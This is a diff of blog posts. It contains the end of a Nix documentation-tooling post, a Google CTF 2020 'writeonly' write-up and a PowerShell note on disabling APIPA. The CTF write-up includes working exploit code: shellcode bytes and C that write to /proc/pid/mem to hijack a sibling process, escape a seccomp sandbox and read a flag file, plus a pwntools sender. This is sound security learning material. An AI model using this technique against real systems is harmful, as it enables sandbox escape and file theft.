<font color="#D0CFCC">NixOS Documentation</font>
|
||||||
|
<font color="#26A269">────────────────────</font>
|
||||||
|
# <font color="#12488B"><b>lib.lists.foldl'</b></font> (<font color="#2AA1B3">foldl' :: (b -> a -> b) -> b -> [a] -> b</font>)
|
||||||
|
Strict version of `foldl`.
|
||||||
|
|
||||||
|
<font color="#D0CFCC">NixOS Documentation</font>
|
||||||
|
<font color="#26A269">────────────────────</font>
|
||||||
|
# <font color="#12488B"><b>lib.lists.foldl</b></font> (<font color="#2AA1B3">foldl :: (b -> a -> b) -> b -> [a] -> b</font>)
|
||||||
|
“left fold”, like `foldr`, but from the left:
|
||||||
|
`foldl op nul [x_1 x_2 ... x_n] == op (... (op (op nul x_1) x_2) ... x_n)`.
|
||||||
|
|
||||||
|
Arguments:
|
||||||
|
<font color="#26A269">op</font>: Function argument
|
||||||
|
<font color="#26A269">nul</font>: Function argument
|
||||||
|
<font color="#26A269">list</font>: Function argument
|
||||||
|
|
||||||
|
Example:
|
||||||
|
|
||||||
|
<font color="#D0CFCC">lconcat = foldl (a: b: a + b) "z"</font>
|
||||||
|
<font color="#D0CFCC">lconcat [ "a" "b" "c" ]</font>
|
||||||
|
<font color="#D0CFCC">=> "zabc"</font>
|
||||||
|
<font color="#D0CFCC"># different types</font>
|
||||||
|
<font color="#D0CFCC">lstrange = foldl (str: int: str + toString (int + 1)) "a"</font>
|
||||||
|
<font color="#D0CFCC">lstrange [ 1 2 3 4 ]</font>
|
||||||
|
<font color="#D0CFCC">=> "a2345"</font>
|
||||||
|
|
||||||
|
<font color="#D0CFCC">lconcat = foldl (a: b: a + b) "z"</font>
|
||||||
|
<font color="#D0CFCC">lconcat [ "a" "b" "c" ]</font>
|
||||||
|
<font color="#D0CFCC">=> "zabc"</font>
|
||||||
|
<font color="#D0CFCC"># different types</font>
|
||||||
|
<font color="#D0CFCC">lstrange = foldl (str: int: str + toString (int + 1)) "a"</font>
|
||||||
|
<font color="#D0CFCC">lstrange [ 1 2 3 4 ]</font>
|
||||||
|
<font color="#D0CFCC">=> "a2345"</font>
|
||||||
|
</code></pre>
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
`manix` includes the file path with the documentation from the nixpkgs sources
|
||||||
|
but no line number. It also includes NixOS manual documentation, which I
|
||||||
|
appreciate.
|
||||||
|
|
||||||
|
```
|
||||||
|
[nix-shell:~/dev/nixpkgs]$ nix-doc foldl
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
<summary>
|
||||||
|
<code class="language-text">nix-doc</code> output
|
||||||
|
</summary>
|
||||||
|
|
||||||
|
<pre class="language-text"><code>
|
||||||
|
“left fold”, like `foldr`, but from the left:
|
||||||
|
`foldl op nul [x_1 x_2 ... x_n] == op (... (op (op nul x_1) x_2) ... x_n)`.
|
||||||
|
|
||||||
|
Type: foldl :: (b -> a -> b) -> b -> [a] -> b
|
||||||
|
|
||||||
|
Example:
|
||||||
|
lconcat = foldl (a: b: a + b) "z"
|
||||||
|
lconcat [ "a" "b" "c" ]
|
||||||
|
=> "zabc"
|
||||||
|
different types
|
||||||
|
lstrange = foldl (str: int: str + toString (int + 1)) "a"
|
||||||
|
lstrange [ 1 2 3 4 ]
|
||||||
|
=> "a2345"
|
||||||
|
<font color="#FFFFFF"><b>foldl</b></font> = op: nul: list: ...
|
||||||
|
# ./lib/lists.nix:80
|
||||||
|
|
||||||
|
</code></pre>
|
||||||
|
</details>
|
||||||
|
|
||||||
|
`nix-doc` basically gets you the same thing, but it is missing `foldl'`, which
|
||||||
|
is a bug in the `nix-doc` command line interface, I think. It does, however,
|
||||||
|
give you a source path with line number so you can use middle click or `C-w F`
|
||||||
|
or similar to go directly to the function's source in your editor.
|
||||||
|
|
||||||
|
### Dynamic
|
||||||
|
|
||||||
|
This is the wheelhouse of `nix-doc`. It adds the two functions demonstrated
|
||||||
|
below (added by the `nix-doc` Nix plugin, see [the README][1] for installation
|
||||||
|
instructions):
|
||||||
|
|
||||||
|
[1]: https://github.com/lf-/nix-doc/#nix-plugin
|
||||||
|
|
||||||
|
<pre class="language-text"><code>nix-repl> n = import <nixpkgs> {}
|
||||||
|
|
||||||
|
nix-repl> builtins.unsafeGetLambdaPos n.lib.foldl
|
||||||
|
{ column = <font color="#2AA1B3">11</font>; file = <font color="#A2734C">"/nix/store/...-nixpkgs-.../nixpkgs/lib/lists.nix"</font>; line = <font color="#2AA1B3">80</font>; }
|
||||||
|
|
||||||
|
nix-repl> builtins.doc n.lib.foldl
|
||||||
|
“left fold”, like `foldr`, but from the left:
|
||||||
|
`foldl op nul [x_1 x_2 ... x_n] == op (... (op (op nul x_1) x_2) ... x_n)`.
|
||||||
|
|
||||||
|
Type: foldl :: (b -> a -> b) -> b -> [a] -> b
|
||||||
|
|
||||||
|
Example:
|
||||||
|
lconcat = foldl (a: b: a + b) "z"
|
||||||
|
lconcat [ "a" "b" "c" ]
|
||||||
|
=> "zabc"
|
||||||
|
different types
|
||||||
|
lstrange = foldl (str: int: str + toString (int + 1)) "a"
|
||||||
|
lstrange [ 1 2 3 4 ]
|
||||||
|
=> "a2345"
|
||||||
|
<font color="#FFFFFF"><b>func</b></font> = op: nul: list: ...
|
||||||
|
# /nix/store/...-nixpkgs-.../nixpkgs/lib/lists.nix:80
|
||||||
|
<font color="#2AA1B3">null</font>
|
||||||
|
</code>
|
||||||
|
</pre>
|
||||||
|
|
||||||
|
You can also get this information using `builtins.unsafeGetAttrPos`, an
|
||||||
|
undocumented built-in function in Nix itself:
|
||||||
|
|
||||||
|
<pre class="language-text"><code>
|
||||||
|
nix-repl> builtins.unsafeGetAttrPos "foldl" n.lib
|
||||||
|
{ column = <font color="#2AA1B3">25</font>; file = <font color="#A2734C">"/nix/store/...-nixpkgs-.../nixpkgs/lib/default.nix"</font>; line = <font color="#2AA1B3">82</font>; }
|
||||||
|
</code></pre>
|
||||||
|
|
||||||
|
## Functions without documentation
|
||||||
|
|
||||||
|
nixpkgs has a few of these. Let's pick on Haskell infrastructure because I am
|
||||||
|
most familiar with it.
|
||||||
|
|
||||||
|
First let's try some static analysis to try to find the signature or source for
|
||||||
|
`nixpkgs.haskell.lib.disableLibraryProfiling`:
|
||||||
|
|
||||||
|
<pre class="language-text"><code>
|
||||||
|
<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> manix disableLibraryProfiling
|
||||||
|
|
||||||
|
<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> nix-doc disableLibraryProfiling
|
||||||
|
|
||||||
|
<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> rg disableLibraryProfiling
|
||||||
|
<font color="#A347BA">pkgs/development/haskell-modules/configuration-common.nix</font>
|
||||||
|
<font color="#26A269">50</font>: ghc-heap-view = <font color="#C01C28"><b>disableLibraryProfiling</b></font> super.ghc-heap-view;
|
||||||
|
<font color="#26A269">51</font>: ghc-datasize = <font color="#C01C28"><b>disableLibraryProfiling</b></font> super.ghc-datasize;
|
||||||
|
<font color="#26A269">1343</font>: graphql-engine = <font color="#C01C28"><b>disableLibraryProfiling</b></font>( overrideCabal (super.graphql-engine.override {
|
||||||
|
|
||||||
|
<font color="#A347BA">pkgs/development/haskell-modules/lib.nix</font>
|
||||||
|
<font color="#26A269">177</font>: <font color="#C01C28"><b>disableLibraryProfiling</b></font> = drv: overrideCabal drv (drv: { enableLibraryProfiling = false; });
|
||||||
|
|
||||||
|
<font color="#A347BA">pkgs/development/haskell-modules/configuration-nix.nix</font>
|
||||||
|
<font color="#26A269">97</font>: hercules-ci-agent = <font color="#C01C28"><b>disableLibraryProfiling</b></font> super.hercules-ci-agent;
|
||||||
|
</code></pre>
|
||||||
|
|
||||||
|
Oh dear! That's not good. Neither the `manix` nor `nix-doc` command line tools
|
||||||
|
found the function. This leaves `rg`, which is not based on the Nix abstract
|
||||||
|
syntax tree, and for functions that are used a lot of times, the definition of
|
||||||
|
a function will get buried among its uses. This is not ideal.
|
||||||
|
|
||||||
|
I believe that in the case of `nix-doc` it may have found
|
||||||
|
it but ignored the function since it had no documentation. Let's test that.
|
||||||
|
|
||||||
|
<details>
|
||||||
|
<summary>Results of adding a comment to see what happens</summary>
|
||||||
|
<pre language="language-text"><code>
|
||||||
|
<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> nix-doc disableLibraryProfiling
|
||||||
|
disable library profiling
|
||||||
|
<font color="#FFFFFF"><b>disableLibraryProfiling</b></font> = drv: ...
|
||||||
|
# ./pkgs/development/haskell-modules/lib.nix:178
|
||||||
|
</code></pre>
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Yep.
|
||||||
|
|
||||||
|
Well, time to pull out the dynamic analysis again. Like in the [simple
|
||||||
|
case](#simple), you can get the source code with `builtins.unsafeGetAttrPos`
|
||||||
|
or the functions added by `nix-doc`. On my system nixpkgs where there is no
|
||||||
|
documentation comment for the function, this is what I get:
|
||||||
|
|
||||||
|
<pre class="language-text"><code>
|
||||||
|
nix-repl> builtins.doc n.haskell.lib.disableLibraryProfiling
|
||||||
|
|
||||||
|
<font color="#FFFFFF"><b>func</b></font> = drv: ...
|
||||||
|
# /nix/store/...-nixpkgs-.../nixpkgs/pkgs/development/haskell-modules/lib.nix:177
|
||||||
|
</code></pre>
|
||||||
|
|
||||||
|
Although there is no documentation, `nix-doc` has pulled out the signature,
|
||||||
|
which may already be enough to guess what the function does. If not, there is a
|
||||||
|
source code reference.
|
||||||
|
|
||||||
|
## Indirection
|
||||||
|
|
||||||
|
The hardest class of functions to find documentation for are ones which are
|
||||||
|
wrapped by some other function. These can be frustrating since the AST pattern
|
||||||
|
matching for functions as used by `nix-doc` and `manix` will fall apart on
|
||||||
|
them.
|
||||||
|
|
||||||
|
An example function like this is `nixpkgs.fetchFromGitLab`, but any arbitrary
|
||||||
|
package created via `callPackage` will also work for this, as they are not
|
||||||
|
really functions, but you do want to find them.
|
||||||
|
|
||||||
|
`manix` knows of the function, but does not know from whence it came, whereas
|
||||||
|
`nix-doc`'s CLI does not see it at all:
|
||||||
|
|
||||||
|
<pre class="language-text"><code>
|
||||||
|
<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> manix fetchFromGitLab
|
||||||
|
<b>Here's what I found in nixpkgs:</b> <font color="#D0CFCC">pkgsMusl.fetchFromGitLab</font>
|
||||||
|
<font color="#D0CFCC">fetchFromGitLab</font> <font color="#D0CFCC">fetchFromGitLab.override</font>
|
||||||
|
<font color="#D0CFCC">fetchFromGitLab.__functor</font> <font color="#D0CFCC">fetchFromGitLab.__functionArgs</font>
|
||||||
|
<font color="#D0CFCC">pkgsHostTarget.fetchFromGitLab</font> <font color="#D0CFCC">pkgsBuildBuild.fetchFromGitLab</font>
|
||||||
|
<font color="#D0CFCC">pkgsStatic.fetchFromGitLab</font> <font color="#D0CFCC">pkgsTargetTarget.fetchFromGitLab</font>
|
||||||
|
<font color="#D0CFCC">targetPackages.fetchFromGitLab</font> <font color="#D0CFCC">gitAndTools.fetchFromGitLab</font>
|
||||||
|
<font color="#D0CFCC">__splicedPackages.fetchFromGitLab</font> <font color="#D0CFCC">buildPackages.fetchFromGitLab</font>
|
||||||
|
<font color="#D0CFCC">pkgsHostHost.fetchFromGitLab</font> <font color="#D0CFCC">pkgsBuildHost.fetchFromGitLab</font>
|
||||||
|
<font color="#D0CFCC">pkgsBuildTarget.fetchFromGitLab</font> <font color="#D0CFCC">pkgsi686Linux.fetchFromGitLab</font>
|
||||||
|
|
||||||
|
|
||||||
|
<font color="#26A269"><b>[nix-shell:~/dev/nixpkgs]$</b></font> nix-doc fetchFromGitLab
|
||||||
|
</code></pre>
|
||||||
|
|
||||||
|
Time to get out the dynamic analysis again!
|
||||||
|
|
||||||
|
<pre class="language-text"><code>
|
||||||
|
nix-repl> n = import <nixpkgs> {}
|
||||||
|
|
||||||
|
nix-repl> builtins.doc n.fetchFromGitLab
|
||||||
|
<font color="#C01C28"><b>error:</b></font> <b>(string)</b>:1:1: value is a set while a lambda was expected
|
||||||
|
|
||||||
|
nix-repl> builtins.typeOf n.fetchFromGitLab
|
||||||
|
<font color="#A2734C">"set"</font>
|
||||||
|
|
||||||
|
nix-repl> n.fetchFromGitLab
|
||||||
|
{ __functionArgs = { ... }; __functor = <font color="#12488B"><b>«lambda @ /nix/store/...-nixpkgs-.../nixpkgs/lib/trivial.nix</b></font>:324:19»; override = { ... }; }
|
||||||
|
</code></pre>
|
||||||
|
|
||||||
|
That didn't work! It's a set with the `__functor` attribute that makes it
|
||||||
|
callable.
|
||||||
|
|
||||||
|
Even if we try pointing `nix-doc` at the `__functor`, it will tell us about
|
||||||
|
`setFunctionArgs`, which is not what we were looking for.
|
||||||
|
|
||||||
|
From what I understand of the Nix internals from writing the plugin, there is
|
||||||
|
not really a nice way of getting the source of a function wrapped like this,
|
||||||
|
since the information is already lost by the time the value enters the dumping
|
||||||
|
function as Nix only stores lambda and attribute definition locations so once
|
||||||
|
you have taken the value of the attribute that information is no longer
|
||||||
|
available.
|
||||||
|
|
||||||
|
This could be resolved with a new REPL command as those take strings of source
|
||||||
|
which could be split to get the attribute name and attribute set, but custom
|
||||||
|
REPL commands are not supported so some kind of modification would have to be
|
||||||
|
made to Nix itself to add this feature.
|
||||||
|
|
||||||
|
Therefore, I have to use the last trick up my sleeve, `unsafeGetAttrPos`, to
|
||||||
|
find the definition of the attribute:
|
||||||
|
|
||||||
|
<pre class="language-text"><code>
|
||||||
|
nix-repl> builtins.unsafeGetAttrPos "fetchFromGitLab" n
|
||||||
|
{ column = <font color="#2AA1B3">3</font>; file = <font color="#A2734C">"/nix/store/...-nixpkgs-.../nixpkgs/pkgs/top-level/all-packages.nix"</font>; line = <font color="#2AA1B3">466</font>; }
|
||||||
|
</code></pre>
|
||||||
|
|
||||||
|
This tells me, albeit in an annoying to copy format, that the next breadcrumb
|
||||||
|
is at `pkgs/top-level/all-packages.nix:466`, which is
|
||||||
|
|
||||||
|
```nix
|
||||||
|
fetchFromGitLab = callPackage ../build-support/fetchgitlab {};
|
||||||
|
```
|
||||||
|
|
||||||
|
Then, I can look in `pkgs/build-support/fetchgitlab` and find a `default.nix`
|
||||||
|
which will have the definition I want.
|
||||||
|
|
||||||
301
content/posts/gctf-2020-writeonly.md
Normal file
301
content/posts/gctf-2020-writeonly.md
Normal file
|
|
@ -0,0 +1,301 @@
|
||||||
|
+++
|
||||||
|
date = "2020-08-23"
|
||||||
|
draft = false
|
||||||
|
path = "/blog/gctf-2020-writeonly"
|
||||||
|
tags = ["ctf", "security"]
|
||||||
|
title = "Google CTF 2020: writeonly"
|
||||||
|
+++
|
||||||
|
|
||||||
|
I participated in the 2020 Google CTF on the UBC CTF team [Maple
|
||||||
|
Bacon](https://ubcctf.github.io/). Without their help, I would have probably
|
||||||
|
given up out of frustration. Special thanks to Robert and Filip who put up with
|
||||||
|
my many questions and swearing at the computer.
|
||||||
|
|
||||||
|
[All the files for my solution are available on my
|
||||||
|
GitHub](https://github.com/lf-/ctf/tree/main/writeonly).
|
||||||
|
|
||||||
|
|
||||||
|
I chose to do this challenge as nobody else on my team was working on it and it
|
||||||
|
looked fairly approachable, after getting frustrated with the assembly of the
|
||||||
|
reversing challenge `beginner`. Unfortunately, the assumption that I wouldn't
|
||||||
|
have to do assembly in this one was completely false, but I tricked myself for
|
||||||
|
long enough to have a proper go at it anyway.
|
||||||
|
|
||||||
|
The challenge gives as a description:
|
||||||
|
|
||||||
|
> This sandbox executes any shellcode you send. But thanks to seccomp, you
|
||||||
|
> won't be able to read /home/user/flag.
|
||||||
|
|
||||||
|
What this means in practice is that there is a seccomp filter with an
|
||||||
|
allow-list of system calls, that does not include `read`, however, as suggested
|
||||||
|
by the challenge name, `write` and `open` *are* supported. This can be abused.
|
||||||
|
|
||||||
|
## Shellcode in C and scaffolding
|
||||||
|
|
||||||
|
The challenge loads whatever you send it into a flat read-write-execute page.
|
||||||
|
|
||||||
|
I wanted to write my shellcode in C because, as mentioned, I didn't want to
|
||||||
|
write assembly! So, I endeavored to figure out how to make that happen. This
|
||||||
|
took more time than the challenge itself, but yak shaving is my specialty. I
|
||||||
|
looked around on the internet for options and found
|
||||||
|
[SheLLVM](https://github.com/SheLLVM/SheLLVM) which I couldn't figure out how
|
||||||
|
to use, [ShellcodeCompiler](https://github.com/NytroRST/ShellcodeCompiler)
|
||||||
|
which doesn't support variables, and [Binary Ninja
|
||||||
|
`scc`](https://scc.binary.ninja/index.html) which I don't have a license for.
|
||||||
|
|
||||||
|
As such, I tried to find prior art on Just Using a Normal Compiler. I found [a
|
||||||
|
good blog post](https://modexp.wordpress.com/2019/04/24/glibc-shellcode/#compile)
|
||||||
|
with lots of details, but it was clearly trying to hack around properties of
|
||||||
|
how executables are linked (and also I couldn't reproduce their string usage
|
||||||
|
myself successfully, even with `-O0`).
|
||||||
|
|
||||||
|
The specific usage of this shellcode has a lot in common with microcontrollers
|
||||||
|
and other embedded platforms in that the executable is loaded into memory and
|
||||||
|
executed immediately. Eventually this led to messing about with linker scripts
|
||||||
|
and staring at both `binutils` documentation and various linker scripts for
|
||||||
|
bare-metal platforms.
|
||||||
|
|
||||||
|
I ended up writing the following linker script to ensure that all the functions
|
||||||
|
were laid out as expected, annotating my `_start` function with
|
||||||
|
`__attribute__((section(".text.prologue")))` to make sure it gets put on top.
|
||||||
|
It also stuffs the `.rodata` section into `.text` to simplify the binary layout
|
||||||
|
(unsure if this is actually necessary).
|
||||||
|
|
||||||
|
```
|
||||||
|
ENTRY(_start);
|
||||||
|
|
||||||
|
SECTIONS
|
||||||
|
{
|
||||||
|
. = ALIGN(16);
|
||||||
|
.text :
|
||||||
|
{
|
||||||
|
*(.text.prologue)
|
||||||
|
*(.text)
|
||||||
|
*(.rodata)
|
||||||
|
}
|
||||||
|
.data :
|
||||||
|
{
|
||||||
|
*(.data)
|
||||||
|
}
|
||||||
|
|
||||||
|
/DISCARD/ :
|
||||||
|
{
|
||||||
|
*(.interp)
|
||||||
|
*(.comment)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Once the ELF is built (having this intermediate form is critical for debugging
|
||||||
|
so I can find addresses of things and have symbols while reading the output
|
||||||
|
assembly), it is `objcopy`'d with `-O binary` to emit the final shellcode
|
||||||
|
binary that can be loaded directly into memory and executed.
|
||||||
|
|
||||||
|
## The path to privilege escalation
|
||||||
|
|
||||||
|
Auditing the code for the challenge, I found that it forks a second process
|
||||||
|
prior to dropping privileges, which runs a function, `check_flag`, in an
|
||||||
|
infinite loop checking the validity of the flag. This seemed pretty suspicious
|
||||||
|
since there is no reason to overwrite the flag (it would cause losing the
|
||||||
|
flag).
|
||||||
|
|
||||||
|
```c
|
||||||
|
pid_t pid = check(fork(), "fork");
|
||||||
|
if (!pid) {
|
||||||
|
while (1) {
|
||||||
|
check_flag();
|
||||||
|
}
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
// ⬇ this is suspicious!!
|
||||||
|
printf("[DEBUG] child pid: %d\n", pid);
|
||||||
|
void_fn sc = read_shellcode();
|
||||||
|
setup_seccomp();
|
||||||
|
sc();
|
||||||
|
```
|
||||||
|
|
||||||
|
My path to the solution was first poking around procfs to see what could be
|
||||||
|
abused. I struggled with `/proc/$pid/stack`, which appears to often be
|
||||||
|
inaccessible. I also initially failed to figure out how `/proc/$pid/mem`
|
||||||
|
worked, and assumed that it did not based on seeing an IO error.
|
||||||
|
|
||||||
|
As it turns out, this `mem` virtual file is basically just the entire memory
|
||||||
|
mappings of the process as a file, and you can `lseek` to any point in it and
|
||||||
|
use `write` to poke it. This sounded like it could enable execution to be taken
|
||||||
|
over given `write(2)` on it, so it was what I went with.
|
||||||
|
|
||||||
|
## Failed ROP attempt
|
||||||
|
|
||||||
|
Initially, I assumed falsely that it followed the mappings' access permissions,
|
||||||
|
which I found out later from someone on my team that this was not true. So, I
|
||||||
|
started out trying to write a Return Oriented Programming (ROP) chain to take
|
||||||
|
control of execution.
|
||||||
|
|
||||||
|
I used `ropper` to find gadgets to set up the registers to `syscall`
|
||||||
|
`execve("/bin/cat", "/home/user/flag", NULL)`. I then overwrote the stack to
|
||||||
|
try to get execution to go to my `execve(2)` after the return from
|
||||||
|
`nanosleep(2)`, assuming it would be fairly reliable since the process is
|
||||||
|
spending most of its time in this syscall. This got close to working but after
|
||||||
|
taking a break to sleep, I was informed that `/proc/$pid/mem` actually can
|
||||||
|
change read-only memory regions and changed my approach to simply overwrite the
|
||||||
|
process `.text` section with some shellcode.
|
||||||
|
|
||||||
|
## The exploit
|
||||||
|
|
||||||
|
High level overview:
|
||||||
|
- `fd = open("/proc/$childPid/mem", O_RDWR)`
|
||||||
|
- `lseek(fd, injectPos, SEEK_SET)`
|
||||||
|
- `write(fd, evilCode, sizeof (evilCode))`
|
||||||
|
|
||||||
|
Now that I have the pieces together, and can execute C in-process, it's time to
|
||||||
|
write an exploit. One of the first things I have to contend with is
|
||||||
|
constructing a path to `/proc/$pid/mem`. Well, I can't `getpid()` due to the
|
||||||
|
syscall filter, and it wouldn't even help to find the child PID. This was the
|
||||||
|
first challenge. I read the disassembly of the `main` function to try to find
|
||||||
|
the PID since it would have been returned from fork and it is logged by the
|
||||||
|
suspicious `printf`. As it turned out, it was indeed on the stack, so I wrote
|
||||||
|
some evil inline assembly to get the value pointed to by `rbp - 0x4`.
|
||||||
|
|
||||||
|
The next step was to construct the path. I was unsure of the availability of C
|
||||||
|
string and `itoa`-like functions in the environment, given that there is no
|
||||||
|
standard library present, so I just wrote some. An interesting optimization of
|
||||||
|
this nicked from [later rewriting the exploit in
|
||||||
|
Rust](https://lfcode.ca/blog/writeonly-in-rust) is that my `itoa` goes
|
||||||
|
backwards, writing into a with a buffer containing extra slashes that will
|
||||||
|
otherwise be ignored by the OS. This cut my executable size about in half by
|
||||||
|
not having to reverse the string or perform string copies as one would have to
|
||||||
|
do in a normal `itoa`.
|
||||||
|
|
||||||
|
|
||||||
|
```c
|
||||||
|
int pid;
|
||||||
|
// well, we weren't allowed getpid so,
|
||||||
|
// steal the pid from the caller's stack
|
||||||
|
__asm__ __volatile__ (
|
||||||
|
"mov %0, dword ptr [rbp - 0x4]\n"
|
||||||
|
: "=r"(pid) ::);
|
||||||
|
char pathbuf[64] = "/proc////////////mem";
|
||||||
|
itoa_badly(pid, &pathbuf[15]);
|
||||||
|
```
|
||||||
|
|
||||||
|
Syscalls were performed with more inline assembly, this time lifted directly
|
||||||
|
from the musl sources. Part of my motivation in not using a libc, besides
|
||||||
|
binary size, is that libc requires a bunch more sections to be present in my
|
||||||
|
binary, and I did not want to have to research how to deal with those.
|
||||||
|
|
||||||
|
I chose to inject my stage 2 shellcode right at the point where the loop of
|
||||||
|
`check_flag` would jump back to the beginning as it is a position where it
|
||||||
|
likely will work most of the time.
|
||||||
|
|
||||||
|
Stage 2 shellcode was generated with pwntools `shellcraft`. It was fairly
|
||||||
|
trivial.
|
||||||
|
|
||||||
|
```c
|
||||||
|
int fd = syscall2(SYS_open, (uint64_t)(void *)pathbuf, O_RDWR);
|
||||||
|
|
||||||
|
/* disassemble check_flag
|
||||||
|
* (...)
|
||||||
|
* 0x00000000004022d9 <+167>: mov edi,0x1
|
||||||
|
* 0x00000000004022de <+172>: call 0x44f2e0 <sleep>
|
||||||
|
* 0x00000000004022e3 <+177>: jmp 0x40223a <check_flag+8>
|
||||||
|
*/
|
||||||
|
void *tgt = (void *)0x4022e3;
|
||||||
|
syscall3(SYS_lseek, fd, (uint64_t)tgt, SEEK_SET);
|
||||||
|
|
||||||
|
//////////////////////////////////////////////////////////////
|
||||||
|
// Now, just write shellcode into memory at the injection point.
|
||||||
|
/*
|
||||||
|
* In [4]: sh = shellcraft.amd64.cat('/home/user/flag', 1) + shellcraft.amd64.infloop()
|
||||||
|
* In [5]: print(sh)
|
||||||
|
* / * push b'/home/user/flag\x00' * /
|
||||||
|
* mov rax, 0x101010101010101
|
||||||
|
* push rax
|
||||||
|
* mov rax, 0x101010101010101 ^ 0x67616c662f7265
|
||||||
|
* xor [rsp], rax
|
||||||
|
* mov rax, 0x73752f656d6f682f
|
||||||
|
* push rax
|
||||||
|
* / * call open('rsp', 'O_RDONLY', 0) * /
|
||||||
|
* push SYS_open / * 2 * /
|
||||||
|
* pop rax
|
||||||
|
* mov rdi, rsp
|
||||||
|
* xor esi, esi / * O_RDONLY * /
|
||||||
|
* cdq / * rdx=0 * /
|
||||||
|
* syscall
|
||||||
|
* / * call sendfile(1, 'rax', 0, 2147483647) * /
|
||||||
|
* mov r10d, 0x7fffffff
|
||||||
|
* mov rsi, rax
|
||||||
|
* push SYS_sendfile / * 0x28 * /
|
||||||
|
* pop rax
|
||||||
|
* push 1
|
||||||
|
* pop rdi
|
||||||
|
* cdq / * rdx=0 * /
|
||||||
|
* syscall
|
||||||
|
* jmp $
|
||||||
|
* In [7]: [hex(x) for x in asm(sh)]
|
||||||
|
*/
|
||||||
|
char evil[] = {0x48, 0xb8, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x1, 0x50,
|
||||||
|
0x48, 0xb8, 0x64, 0x73, 0x2e, 0x67, 0x6d, 0x60, 0x66, 0x1, 0x48, 0x31,
|
||||||
|
0x4, 0x24, 0x48, 0xb8, 0x2f, 0x68, 0x6f, 0x6d, 0x65, 0x2f, 0x75, 0x73,
|
||||||
|
0x50, 0x6a, 0x2 , 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x99, 0xf, 0x5,
|
||||||
|
0x41, 0xba, 0xff, 0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a , 0x28,
|
||||||
|
0x58, 0x6a, 0x1, 0x5f, 0x99, 0xf, 0x5, 0xeb, 0xfe};
|
||||||
|
|
||||||
|
syscall3(SYS_write, fd, (uint64_t)(void *)evil, sizeof (evil));
|
||||||
|
```
|
||||||
|
|
||||||
|
I sent it with a simple pwntools script:
|
||||||
|
|
||||||
|
```python
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
f = sys.argv[1]
|
||||||
|
fd = open(f, 'rb')
|
||||||
|
stat = os.stat(f)
|
||||||
|
sz = stat.st_size
|
||||||
|
|
||||||
|
io = remote('writeonly.2020.ctfcompetition.com', 1337)
|
||||||
|
|
||||||
|
# for `make serve`
|
||||||
|
# io = remote('localhost', 8000)
|
||||||
|
|
||||||
|
# you can gdb into the parent before we send malicious code
|
||||||
|
input()
|
||||||
|
io.sendline(str(sz))
|
||||||
|
io.send(fd.read())
|
||||||
|
io.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
Then, the exciting moment:
|
||||||
|
|
||||||
|
```
|
||||||
|
ctf/writeonly » make send
|
||||||
|
python send.py shellcode.bin
|
||||||
|
[+] Opening connection to writeonly.2020.ctfcompetition.com on port 1337: Done
|
||||||
|
|
||||||
|
[*] Switching to interactive mode
|
||||||
|
[DEBUG] child pid: 2
|
||||||
|
shellcode length? reading 576 bytes of shellcode. CTF{why_read_when_you_can_write}
|
||||||
|
$
|
||||||
|
```
|
||||||
|
|
||||||
|
## Learnings
|
||||||
|
|
||||||
|
Many. The one thing I did really right was making it easy to try again. Writing
|
||||||
|
a Makefile for the various things I needed to run was immensely valuable so I
|
||||||
|
didn't have to remember commands.
|
||||||
|
|
||||||
|
Late in the process I had a lot of trouble debugging a problem where the
|
||||||
|
exploit chain would work on local processes but not remotely. It turned out to
|
||||||
|
be that I was injecting in a location where it would sometimes corrupt
|
||||||
|
execution state of the checking process depending on where it was, and was
|
||||||
|
fixed by moving where I was injecting. However, I initially thought it was
|
||||||
|
ASLR, so fought with `gdb` a bunch about that.
|
||||||
|
|
||||||
|
Filip suggested that I use `socat TCP-LISTEN:8000,bind=localhost,reuseaddr,fork
|
||||||
|
EXEC:./chal` to essentially emulate the challenge server locally, and debug the
|
||||||
|
remote process. If the process is not started with `gdb` it is more likely to
|
||||||
|
be reproducible. This helped a lot in eliminating that as a variable while
|
||||||
|
debugging.
|
||||||
27
content/posts/general-network-error-54.md
Normal file
27
content/posts/general-network-error-54.md
Normal file
|
|
@ -0,0 +1,27 @@
|
||||||
|
+++
|
||||||
|
author = "lf"
|
||||||
|
categories = ["PowerShell", "Windows Server", "Active Directory"]
|
||||||
|
date = 2015-05-23T21:48:15Z
|
||||||
|
description = ""
|
||||||
|
draft = false
|
||||||
|
path = "/blog/general-network-error-54"
|
||||||
|
tags = ["PowerShell", "Windows Server", "Active Directory"]
|
||||||
|
title = "General Network Error when running Install-ADDSForest"
|
||||||
|
|
||||||
|
+++
|
||||||
|
|
||||||
|
When I was messing about with AD DS a bit on Windows Server 2016 TP 2, I encountered the error General Network Error, with error ID 54. This is obviously a very unhelpful error. In troubleshooting, I noticed that the VM was being assigned an address in `169.254.x.x`. This wasn't part of my intended IP range, so I started investigating.
|
||||||
|
|
||||||
|
It turns out that `169.254.x.x` is a reserved range for APIPA (Automatic Private IP Addressing), where an operating system automatically assigns an IP when there is no DHCP available (which there wasn't because I intended to set up Windows DHCP). After disabling this, the AD setup worked correctly.
|
||||||
|
|
||||||
|
You may be wondering how to disable this problematic system. Here's how you do it (in PowerShell):
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# Disable DHCP
|
||||||
|
Get-NetAdapter | Set-NetIPInterface -Dhcp Disabled
|
||||||
|
# Disable APIPA
|
||||||
|
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters' -Name IPAutoconfigurationEnabled -Value 0 -Type DWord
|
||||||
|
# Reboot to apply
|
||||||
|
Restart-Computer
|
||||||
|
```
|
||||||
|
|
||||||
28
